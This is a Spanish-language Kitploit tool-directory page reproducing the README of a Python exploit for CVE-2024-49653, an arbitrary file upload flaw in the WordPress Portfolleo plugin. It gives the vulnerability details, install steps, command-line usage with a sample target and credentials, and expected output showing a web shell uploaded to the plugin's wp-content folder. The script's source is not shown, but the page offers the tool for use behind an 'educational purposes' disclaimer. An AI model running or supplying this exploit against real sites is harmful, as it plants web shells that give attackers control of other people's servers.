Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/nxploited/cve-2024-49653
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2024-49653

CVE-2024-49653

Plugin Portfolleo de WordPress <= 1.2 - Vulnerabilidad de carga de archivos arbitraria

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

📜 Exploit del plugin Portfolleo de WordPress (CVE-2024-49653)

🚨 Detalles de la vulnerabilidad

Título: Plugin Portfolleo de WordPress <= 1.2 - Vulnerabilidad de subida arbitraria de archivos

Descripción:
Vulnerabilidad de subida sin restricciones de archivos con tipo peligroso en James Eggers Portfolleo portfolleo que permite subir un web shell a un servidor web. Este problema afecta a Portfolleo desde la versión n/a hasta la 1.2.

Más información:

  • CWE-434: CWE-434 Subida sin restricciones de archivos con tipo peligroso

Puntuación CVSS:

  • Puntuación: 9.9
  • Severidad: CRÍTICA
  • Versión: 3.1
  • Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

📋 Guía de usuario

🚀 Uso del script

Este script explota la vulnerabilidad de subida arbitraria de archivos en el plugin Portfolleo de WordPress (versiones <= 1.2) para subir un web shell.

📦 Requisitos

Necesitas tener instalado lo siguiente para ejecutar el script:

  • Python 3
  • Librería requests
  • Librería beautifulsoup4

Puedes instalar las librerías necesarias usando:

root@kitploit:~
pip install requests beautifulsoup4

🛠️ Uso

Ejecuta el script con las siguientes opciones:

root@kitploit:~

CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD

WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of the site (e.g. http://target/wordpress)
  -U, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password

📝 Ejemplo

root@kitploit:~
 
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123

📊 Salida esperada

Si el script se ejecuta correctamente, deberías ver la siguiente salida:

root@kitploit:~
[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php

⚠️ Descargo de responsabilidad

Este script tiene fines exclusivamente educativos. El autor no respalda el uso de este script para actividades ilegales. Úsalo de manera responsable y solo en sistemas con permiso explícito para probar.

Por: Nxploited | Khaled Alenazi

Descargar herramienta